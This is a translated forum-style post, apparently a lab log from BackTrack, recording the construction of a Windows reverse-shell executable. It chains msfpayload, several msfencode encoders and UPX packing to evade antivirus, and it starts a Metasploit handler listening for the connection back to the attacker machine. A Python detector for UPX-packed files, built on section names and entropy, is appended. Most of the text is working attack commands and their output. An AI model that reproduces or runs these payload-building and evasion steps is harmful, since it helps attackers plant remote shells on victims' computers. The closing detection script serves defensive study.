root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o payload3.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)
[*] x86/alpha_upper succeeded with size 967 (iteration=1)
[*] x86/alpha_upper succeeded with size 2002 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2031 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 2060 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2089 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2118 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2147 (iteration=5)
[*] x86/countdown succeeded with size 2165 (iteration=1)
[*] x86/countdown succeeded with size 2183 (iteration=2)
[*] x86/countdown succeeded with size 2201 (iteration=3)
[*] x86/countdown succeeded with size 2219 (iteration=4)
[*] x86/countdown succeeded with size 2237 (iteration=5)
real 17m56.774s
user 1m22.481s
sys 6m38.633s
root@bt:~# ls
Desktop payload3.exe
The command above produced payload3.exe.
Next, UPX:
root@bt:~# apt-get install upx
Reading package lists... Done
Building dependency tree
Reading state information... Done
Note, selecting upx-ucl instead of upx
upx-ucl is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@bt:~# upx --help
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2009
UPX 3.04 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 27th 2009
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
Commands:
-1 compress faster -9 compress better
--best compress best (can be slow for big files)
-d decompress -l list compressed file
-t test compressed file -V display version number
-h give this help -L display software license
Options:
-q be quiet -v be verbose
-oFILE write output to 'FILE'
-f force compression of suspicious files
--no-color, --mono, --color, --no-progress change look
Compression tuning options:
--brute try all available compression methods & filters [slow]
--ultra-brute try even more compression variants [very slow]
Backup options:
-k, --backup keep backup files
--no-backup no backup files [default]
Overlay options:
--overlay=copy copy any extra data attached to the file [default]
--overlay=strip strip any extra data attached to the file [DANGEROUS]
--overlay=skip don't compress a file with an overlay
Options for djgpp2/coff:
--coff produce COFF output [default: EXE]
Options for dos/com:
--8086 make compressed com work on any 8086
Options for dos/exe:
--8086 make compressed exe work on any 8086
--no-reloc put no relocations in to the exe header
Options for dos/sys:
--8086 make compressed sys work on any 8086
Options for ps1/exe:
--8-bit uses 8 bit size compression [default: 32 bit]
--8mib-ram 8 megabyte memory limit [default: 2 MiB]
--boot-only disables client/host transfer compatibility
--no-align don't align to 2048 bytes [enables: --console-run]
Options for watcom/le:
--le produce LE output [default: EXE]
Options for win32/pe, rtm32/pe & arm/pe:
--compress-exports=0 do not compress the export section
--compress-exports=1 compress the export section [default]
--compress-icons=0 do not compress any icons
--compress-icons=1 compress all but the first icon
--compress-icons=2 compress all but the first icon directory [default]
--compress-icons=3 compress all icons
--compress-resources=0 do not compress any resources at all
--keep-resource=list do not compress resources specified by list
--strip-relocs=0 do not strip relocations
--strip-relocs=1 strip relocations [default]
file.. executables to (de)compress
This version supports:
AMD64-darwin.macho Mach/AMD64
ARMEL-darwin.macho Mach/ARMEL
amd64-linux.elf linux/ElfAMD
amd64-linux.kernel.vmlinux vmlinux/AMD64
arm-linux.elf linux/armel
arm-linux.kernel.vmlinux vmlinux/armel
arm-wince.pe arm/pe
armeb-linux.elf linux/armeb
armeb-linux.kernel.vmlinux vmlinux/armeb
armel-linux.kernel.vmlinuz vmlinuz/armel
fat-darwin.macho Mach/fat
i086-dos16.com dos/com
i086-dos16.exe dos/exe
i086-dos16.sys dos/sys
i386-bsd.elf.execve BSD/386
i386-darwin.dylib Dylib/i386
i386-darwin.macho Mach/i386
i386-dos32.djgpp2.coff djgpp2/coff
i386-dos32.tmt.adam tmt/adam
i386-dos32.watcom.le watcom/le
i386-freebsd.elf BSD/elf386
i386-linux.elf linux/elf386
i386-linux.elf.execve linux/386
i386-linux.elf.shell linux/sh386
i386-linux.kernel.bvmlinuz bvmlinuz/386
i386-linux.kernel.vmlinux vmlinux/386
i386-linux.kernel.vmlinuz vmlinuz/386
i386-netbsd.elf BSD/elf386
i386-openbsd.elf BSD/elf386
i386-win32.pe win32/pe
m68k-atari.tos atari/tos
mips-linux.elf linux/mipseb
mipsel-linux.elf linux/mipsel
mipsel.r3000-ps1 ps1/exe
powerpc-darwin.dylib Dylib/ppc32
powerpc-darwin.macho Mach/ppc32
powerpc-linux.elf linux/ElfPPC
powerpc-linux.kernel.vmlinux vmlinux/ppc32
UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net
root@bt:~#
Now pack it:
root@bt:~# upx -5 payload3.exe -k
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2009
UPX 3.04 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 27th 2009
File size Ratio Format Name
-------------------- ------ ----------- -----------
73802 -> 48128 65.21% win32/pe payload3.exe
Packed 1 file.
root@bt:~# ls -l
total 276
drwxr-xr-x 2 root root 48 2011-05-07 13:46 Desktop
-rw-r--r-- 1 root root 73802 2013-04-28 04:21 payload3_before.exe
-rw-r--r-- 1 root root 73802 2013-04-28 04:53 payload3.ex~
-rw-r--r-- 1 root root 48128 2013-04-28 04:53 payload3.exe
-rw-r--r-- 1 root root 73802 2013-04-28 04:28 read.exe
root@bt:~#
After packing, payload3.exe is smaller; the backup file is payload3.ex~.
I uploaded payload3.exe to the XP machine and found that AVG reported a threat. After turning off the antivirus I double-clicked the exe and found that, after packing, it could not connect back to BT, because:
root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 E
[*] Please wait while we load the module tree...
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
PAYLOAD => windows/shell_reverse_tcp
LHOST => 192.168.1.11
LPORT => 31337
[*] Started reverse handler on 192.168.1.11:31337
[*] Starting the payload handler...
It stays in this state. But without UPX packing, double-clicking the exe does connect back to BT5. I don't know why.
To check whether the packing itself had failed, I tested with a normal putty.exe; the result: for putty.exe there is no problem.
The above may be because packing failed, or because decompression takes a long time, or for some other reason.
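As an added example (not code from the original post), the following Python script shows the kind of check a scanner such as the AVG install mentioned above can apply to a UPX-packed file like payload3.exe: it walks the PE section table and flags the default section names UPX writes (UPX0/UPX1) as well as the layout UPX produces, a section with zero raw size reserved for the unpacked image next to a small, high-entropy section holding the compressed data. The PE builder and the two sample images are constructed test data (they parse but do not run), and the 7.0 bits-per-byte entropy threshold is an assumption.

```python
import math
import random
import struct

# Added example, not the original post's code: a minimal PE section-table walker plus
# two heuristics a scanner can apply to a UPX-packed file: the default section names
# UPX writes, and UPX's layout (a zero-raw-size section for the unpacked image beside a
# small, high-entropy section of compressed data). The entropy threshold is an assumption.

IMAGE_NT_SIGNATURE = b"PE\0\0"
SECTION_HEADER_SIZE = 40
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}
HIGH_ENTROPY_BITS = 7.0  # assumed threshold; compressed data sits close to 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant run, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Return (name, raw_offset, raw_size, virtual_size) for each section in the table."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != IMAGE_NT_SIGNATURE:
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF header: Machine(2) NumberOfSections(2) 12 bytes of timestamp/symbol fields,
    # SizeOfOptionalHeader(2) Characteristics(2); the section table follows the optional header.
    num_sections, opt_size = struct.unpack_from("<2xH12xH2x", pe, coff)
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        hdr = table + i * SECTION_HEADER_SIZE
        name = pe[hdr:hdr + 8].rstrip(b"\0")
        vsize, _va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, hdr + 8)
        sections.append((name, raw_ptr, raw_size, vsize))
    return sections


def packing_indicators(pe: bytes) -> dict:
    """Evaluate the heuristics and return them together with a one-line verdict."""
    sections = parse_sections(pe)
    named = bool({s[0] for s in sections} & UPX_SECTION_NAMES)
    unpack_target = any(raw_size == 0 and vsize > 0 for _, _, raw_size, vsize in sections)
    entropies = {name: shannon_entropy(pe[ptr:ptr + raw_size])
                 for name, ptr, raw_size, _ in sections if raw_size}
    high_entropy = any(e >= HIGH_ENTROPY_BITS for e in entropies.values())
    if named:
        verdict = "likely UPX-packed (UPX section names)"
    elif unpack_target and high_entropy:
        verdict = "likely packed (UPX-like layout, sections renamed)"
    else:
        verdict = "no packing indicators"
    return {"upx_names": named, "unpack_target": unpack_target,
            "high_entropy": high_entropy, "entropies": entropies, "verdict": verdict}


def build_pe(sections) -> bytes:
    """Constructed test image: DOS stub, PE signature, COFF header (no optional header),
    section table and raw section data. It parses; it is not a runnable executable."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    raw_ptr = e_lfanew + 4 + len(coff) + len(sections) * SECTION_HEADER_SIZE
    table, body, va = bytearray(), bytearray(), 0x1000
    for name, raw, vsize in sections:
        table += name.ljust(8, b"\0")
        table += struct.pack("<IIII", vsize, va, len(raw), raw_ptr if raw else 0)
        table += b"\0" * 16  # relocation, line-number and Characteristics fields
        body += raw
        raw_ptr += len(raw)
        va += max(vsize, 0x1000)
    return bytes(dos) + IMAGE_NT_SIGNATURE + coff + bytes(table) + bytes(body)


def sample_packed_pe() -> bytes:
    """UPX-style layout: empty UPX0, compressed-looking UPX1, small .rsrc (constructed)."""
    rng = random.Random(1337)  # deterministic stand-in for compressed bytes
    compressed = bytes(rng.getrandbits(8) for _ in range(4096))
    return build_pe([(b"UPX0", b"", 0x8000), (b"UPX1", compressed, 0x1200),
                     (b".rsrc", b"\0" * 512, 0x200)])


def sample_plain_pe() -> bytes:
    """Unpacked layout: repetitive code bytes and a mostly-zero data section (constructed)."""
    code = b"\x55\x8b\xec\x83\xec\x10\x33\xc0\x5d\xc3" * 200
    data = b"Hello, world\0".ljust(512, b"\0")
    return build_pe([(b".text", code, 0x1000), (b".data", data, 0x200)])


if __name__ == "__main__":
    for label, image in (("packed", sample_packed_pe()), ("plain", sample_plain_pe())):
        print(label, packing_indicators(image)["verdict"])
```

The section-name check is the cheapest signal and is what most engines fire on for a stock UPX build; the layout-plus-entropy check is there because renaming sections does not change the fact that the decompression target has no raw data while the compressed section has almost eight bits of entropy per byte. Running the script on a real file means replacing the sample images with `open(path, "rb").read()`.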